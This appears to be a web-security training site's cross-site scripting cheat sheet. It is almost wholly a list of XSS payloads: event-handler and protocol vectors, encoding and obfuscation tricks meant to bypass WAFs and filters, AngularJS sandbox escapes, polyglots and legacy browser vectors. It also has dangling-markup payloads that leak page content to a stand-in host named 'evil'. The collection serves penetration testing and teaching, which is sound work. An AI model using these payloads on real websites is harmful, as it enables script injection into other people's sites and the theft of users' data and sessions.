1. Web Security Academy
  2. Cross-site scripting
  3. Cheat sheet

XSS cheat sheet

This XSS cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector.

Event handlers

Event handlers that do not require user interaction

Event:

Description:

Tag:

Code:

Copy:

onactivate

Fires when the element is activated

<a id=x tabindex=1 onactivate=alert(1)></a>

Compatibility:

CFES
onafterprint

Fires after the page is printed

<body onafterprint=alert(1)>

Compatibility:

CFES
onanimationcancel

Fires when a CSS animation cancels

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a>

Compatibility:

CFES
onanimationend

Fires when a CSS animation ends

<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a>

Compatibility:

CFES
onanimationiteration

Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><a style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></a>

Compatibility:

CFES
onanimationstart

Fires when a CSS animation starts

<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a>

Compatibility:

CFES
onbeforeactivate

Fires before the element is activated

<a id=x tabindex=1 onbeforeactivate=alert(1)></a>

Compatibility:

CFES
onbeforedeactivate

Fires before the element is deactivated

<a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus>

Compatibility:

CFES
onbeforeprint

Fires before the page is printed

<body onbeforeprint=alert(1)>

Compatibility:

CFES
onbeforeunload

Fires after if the url changes

<body onbeforeunload="location='javascript:alert(1)'">

Compatibility:

CFES
onbegin

Fires when a svg animation begins

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Compatibility:

CFES
onblur

Fires when an element loses focus

<a onblur=alert(1) tabindex=1 id=x></a><input autofocus>

Compatibility:

CFES
onbounce

Fires when the marquee bounces

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>

Compatibility:

CFES
oncanplay

Fires if the resource can be played

<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
oncanplaythrough

Fires when enough data has been loaded to play the resource all the way through

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>

Compatibility:

CFES
ondeactivate

Fires when the element is deactivated

<a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus>

Compatibility:

CFES
onend

Fires when a svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>

Compatibility:

CFES
onended

Fires when the resource is finished playing

<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onerror

Fires when the resource fails to load or causes an error

<audio src/onerror=alert(1)>

Compatibility:

CFES
onfinish

Fires when the marquee finishes

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>

Compatibility:

CFES
onfocus

Fires when the element has focus

<a id=x tabindex=1 onfocus=alert(1)></a>

Compatibility:

CFES
onfocusin

Fires when the element has focus

<a id=x tabindex=1 onfocusin=alert(1)></a>

Compatibility:

CFES
onfocusout

Fires when an element loses focus

<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>

Compatibility:

CFES
onhashchange

Fires if the hash changes

<body onhashchange="alert(1)">

Compatibility:

CFES
onload

Fires when the element is loaded

<svg><a onload=alert(1)></a>

Compatibility:

CFES
onloadeddata

Fires when the first frame is loaded

<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onloadedmetadata

Fires when the meta data is loaded

<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onloadend

Fires when the element finishes loading

<img src=validimage.png onloadend=alert(1)>

Compatibility:

CFES
onloadstart

Fires when the element begins to load

<img src=validimage.png onloadstart=alert(1)>

Compatibility:

CFES
onmessage

Fires when message event is received from a postMessage call

<body onmessage=alert(1)>

Compatibility:

CFES
onpageshow

Fires when the page is shown

<body onpageshow=alert(1)>

Compatibility:

CFES
onplay

Fires when the resource is played

<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onplaying

Fires the resource is playing

<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onpopstate

Fires when the history changes

<body onpopstate=alert(1)>

Compatibility:

CFES
onreadystatechange

Fires when the ready state changes

<applet onreadystatechange=alert(1)></applet>

Compatibility:

CFES
onrepeat

Fires when a svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />

Compatibility:

CFES
onresize

Fires when the window is resized

<body onresize="alert(1)">

Compatibility:

CFES
onscroll

Fires when the page scrolls

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

Compatibility:

CFES
onstart

Fires when the marquee starts

<marquee onstart=alert(1)>XSS</marquee>

Compatibility:

CFES
ontimeupdate

Fires when the timeline is changed

<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
ontransitioncancel

Fires when a CSS transition cancels

<style>:target {color: red;}</style><a id=x style="transition:color 10s" ontransitioncancel=alert(1)></a>

Compatibility:

CFES
ontransitionend

Fires when a CSS transition ends

<style>:target {color:red;}</style><a id=x style="transition:color 1s" ontransitionend=alert(1)></a>

Compatibility:

CFES
ontransitionrun

Fires when a CSS transition begins

<style>:target {transform: rotate(180deg);}</style><a id=x style="transition:transform 2s" ontransitionrun=alert(1)></a>

Compatibility:

CFES
onunhandledrejection

Fires when a promise isn't handled

<body onunhandledrejection=alert(1)><script>fetch('//xyz')<\/script>

Compatibility:

CFES
onwaiting

Fires when while waiting for the data

<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type=video/mp4></video>

Compatibility:

CFES

Event handlers that do require user interaction

Event:

Description:

Tag:

Code:

Copy:

onauxclick

Fires when right clicking or using the middle button of the mouse

<input onauxclick=alert(1)>

Compatibility:

CFES
onbeforecopy

Requires you copy a piece of text

<a onbeforecopy="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onbeforecut

Requires you cut a piece of text

<a onbeforecut="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onbeforepaste

Requires you paste a piece of text

<a onbeforepaste="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onchange

Requires as change of value

<input onchange=alert(1) value=xss>

Compatibility:

CFES
onclick

Requires a click of the element

<a onclick="alert(1)">test</a>

Compatibility:

CFES
oncontextmenu

Triggered when right clicking to show the context menu

<a oncontextmenu="alert(1)">test</a>

Compatibility:

CFES
oncopy

Requires you copy a piece of text

<a oncopy="alert(1)" contenteditable>test</a>

Compatibility:

CFES
oncut

Requires you cut a piece of text

<a oncut="alert(1)" contenteditable>test</a>

Compatibility:

CFES
ondblclick

Triggered when double clicking the element

<a ondblclick="alert(1)">test</a>

Compatibility:

CFES
ondrag

Triggered dragging the element

<a draggable="true" ondrag="alert(1)">test</a>

Compatibility:

CFES
ondragend

Triggered dragging is finished on the element

<a draggable="true" ondragend="alert(1)">test</a>

Compatibility:

CFES
ondragenter

Requires a mouse drag

<a draggable="true" ondragenter="alert(1)">test</a>

Compatibility:

CFES
ondragleave

Requires a mouse drag

<a draggable="true" ondragleave="alert(1)">test</a>

Compatibility:

CFES
ondragover

Triggered dragging over an element

<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>

Compatibility:

CFES
ondragstart

Requires a mouse drag

<a draggable="true" ondragstart="alert(1)">test</a>

Compatibility:

CFES
ondrop

Triggered dropping a draggable element

<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>

Compatibility:

CFES
oninput

Requires as change of value

<input oninput=alert(1) value=xss>

Compatibility:

CFES
oninvalid

Requires a form submission with an element that does not satisfy its constraints such as a required attribute.

<form><input oninvalid=alert(1) required><input type=submit>

Compatibility:

CFES
onkeydown

Triggered when a key is pressed

<a onkeydown="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onkeypress

Triggered when a key is pressed

<a onkeypress="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onkeyup

Triggered when a key is released

<a onkeyup="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onmousedown

Triggered when the mouse is pressed

<a onmousedown="alert(1)">test</a>

Compatibility:

CFES
onmouseenter

Triggered when the mouse is hovered over the element

<a onmouseenter="alert(1)">test</a>

Compatibility:

CFES
onmouseleave

Triggered when the mouse is moved away from the element

<a onmouseleave="alert(1)">test</a>

Compatibility:

CFES
onmousemove

Requires mouse movement

<a onmousemove="alert(1)">test</a>

Compatibility:

CFES
onmouseout

Triggered when the mouse is moved away from the element

<a onmouseout="alert(1)">test</a>

Compatibility:

CFES
onmouseover

Requires a hover over the element

<a onmouseover="alert(1)">test</a>

Compatibility:

CFES
onmouseup

Triggered when the mouse button is released

<a onmouseup="alert(1)">test</a>

Compatibility:

CFES
onpaste

Requires you paste a piece of text

<a onpaste="alert(1)" contenteditable>test</a>

Compatibility:

CFES
onpause

Requires clicking the element to pause

<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onreset

Requires a click

<form onreset=alert(1)><input type=reset>

Compatibility:

CFES
onsearch

Fires when a form is submitted and the input has a type attribute of search

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>

Compatibility:

CFES
onseeked

Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onseeking

Requires clicking the element timeline

<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>

Compatibility:

CFES
onselect

Requires you select text

<input onselect=alert(1) value="XSS" autofocus>

Compatibility:

CFES
onsubmit

Requires a form submission

<form onsubmit=alert(1)><input type=submit>

Compatibility:

CFES
onvolumechange
onwheel

Fires when you use the mouse wheel

<body onwheel=alert(1)>

Compatibility:

CFES

Protocols

Iframe src attribute JavaScript protocol

<iframe src="javascript:alert(1)">

Object data attribute with JavaScript protocol

<object data="javascript:alert(1)">

Embed src attribute with JavaScript protocol

<embed src="javascript:alert(1)">

A standard JavaScript protocol

<a href="javascript:alert(1)">XSS</a>

The protocol is not case sensitive

<a href="JaVaScript:alert(1)">XSS</a>

Characters \x01-\x20 are allowed before the protocol

<a href=" javascript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed inside the protocol

<a href="javas cript:alert(1)">XSS</a>

Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

<a href="javascript :alert(1)">XSS</a>

Xlink namespace inside SVG with JavaScript protocol

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>

SVG animate tag

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

Data protocol inside script src

<script src="data:text/javascript,alert(1)"></script>

SVG script href attribute without closing script tag

<svg><script href="data:text/javascript,alert(1)" />

SVG use element Chrome/Firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>

Import statement with data URL

<script>import('data:text/javascript,alert(1)')</script>

Base tag with JavaScript protocol rewriting relative URLS

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>

MathML makes any tag clickable

<math><x href="javascript:alert(1)">blah

Button and formaction

<form><button formaction=javascript:alert(1)>XSS

Input and formaction

<form><input type=submit formaction=javascript:alert(1) value=XSS>

Form and action

<form action=javascript:alert(1)><input type=submit value=XSS>

Isindex and formaction

<isindex type=submit formaction=javascript:alert(1)>

Isindex and action

<isindex type=submit action=javascript:alert(1)>

Other useful attributes

Using srcdoc attribute

<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>

Using srcdoc with entities

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>

Click a submit element from anywhere on the page, even outside the form

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>

Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements: Access key attributes can enable XSS on normally unexploitable elements

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the current webpage

<a href=# download="filename.html">Test</a>

Disable referrer using referrerpolicy

<img referrerpolicy="no-referrer" src="//portswigger-labs.net">

Special tags

Redirect to a different domain

<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">

Meta charset attribute UTF-7

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Meta charset UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document)

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document)

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document)

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

UTF-7 BOM characters (Has to be at the start of the document)

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-

Upgrade insecure requests

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">

Disable JavaScript via iframe sandbox

<iframe sandbox src="//portswigger-labs.net"></iframe>

Disable referer

<meta name="referrer" content="no-referrer">

Encoding

Overlong UTF-8

%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>

Unicode escapes

<script>\u0061lert(1)</script>

Unicode escapes ES6 style

<script>\u{61}lert(1)</script>

Unicode escapes ES6 style zero padded

<script>\u{0000000061}lert(1)</script>

Hex encoding

<script>eval('\x61lert(1)')</script>

Octal encoding

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>

Decimal encoding with optional semi-colon

<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>

SVG script with HTML encoding

<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>

Decimal encoding with padded zeros

<a href="&#0000106avascript:alert(1)">XSS</a>

Hex encoding

<a href="&#x6a;avascript:alert(1)">XSS</a>

Hex encoding without semi-colon provided next character is not a-f0-9

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>

Hex encoding with padded zeros

<a href="&#x0000006a;avascript:alert(1)">XSS</a>

Hex encoding is not case sensitive

<a href="&#X6A;avascript:alert(1)">XSS</a>

HTML entities

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>

URL encoding

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

HTML entities and URL encoding

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

Obfuscation

Firefox allows NULLS after &

<a href="javascript&#x6a;avascript:alert(1)">Firefox</a>

Firefox allows NULLs inside named entities

<a href="javascript&colon;alert(1)">Firefox</a>

Firefox allows NULL characters inside opening comments

<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->

Client-side template injection

AngularJS sandbox escapes reflected

Version:

Author:

Length:

Vector:

Copy:

1.0.1 - 1.1.5

Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)

33

{{$on.constructor('alert(1)')()}}

1.2.2 - 1.2.5

Gareth Heyes (PortSwigger)

23

{{{}.")));alert(1)//"}}

1.2.24 - 1.2.29

Gareth Heyes (PortSwigger)

23

{{{}.")));alert(1)//"}}

1.2.27 - 1.2.29 / 1.3.0 - 1.3.20

Gareth Heyes (PortSwigger)

23

{{{}.")));alert(1)//"}}

>=1.6.0 (shorter)

Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys)

33

{{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes

(using orderBy or no $eval)

Version:

Author:

Length:

Vector:

Copy:

1.2.27 - 1.2.29 / 1.3.0 - 1.3.20

Gareth Heyes (PortSwigger)

20

{}.")));alert(1)//";

AngularJS CSP bypasses

Scriptless attacks

Dangling markup

Link href stylesheet

<link rel=stylesheet href="//evil?

Link href icon

<link rel=icon href="//evil?

Img to pass markup through src attribute

<img src="//evil? <image src="//evil?

Video using track element

<video><track default src="//evil?

Video using source element and src attribute

<video><source src="//evil?

Audio using source element and src attribute

<audio><source src="//evil?

Isindex using src attribute

<isindex type=image src="//evil?

Object data

<object data="//evil?

Iframe src

<iframe src="//evil?

Embed src

<embed src="//evil?

Use textarea to consume markup and post to external site

<form><button formaction=//evil>XSS</button><textarea name=x>

Pass markup data through window.name using form target

<button form=x>XSS</button><form id=x action=//evil target='

Using embed window name to pass data from the page

<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using iframe window name to pass data from the page

<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Using object window name to pass data from the page

<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="

Polyglots

Polyglot payload 1 by Gareth Heyes

javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Polyglot payload 1 by Crlf

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

Classic vectors (XSS crypt)

Image src with JavaScript protocol

<img src="javascript:alert(1)">

Body background with JavaScript protocol

<body background="javascript:alert(1)">

Iframe data urls no longer work as modern browsers use a null origin

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">

VBScript protocol used to work in IE

<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>

JScript compact was a minimal version of JS that wasn't widely used in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>

JScript.Encode allows encoded JavaScript

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>

VBScript.Encoded allows encoded VBScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>

JavaScript entities used to work in Netscape Navigator

<a title="&{alert(1)}">XSS</a>

JavaScript stylesheets used to be supported by Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">

Button used to consume markup

<form><button name=x formaction=x><b>stealme

IE9 select elements and plaintext used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>

XBL Firefox only <= 2

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">

XBL also worked in FF3.5 using data urls

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />

CSS expressions <=IE7

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>

In quirks mode IE allowed you to use = instead of :

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>

Behaviors for older modes of IE

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>

Older versions of IE supported event handlers in functions

<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script> </body>

GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>

Credits

Brought to you by PortSwigger lovingly constructed by Gareth Heyes

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski.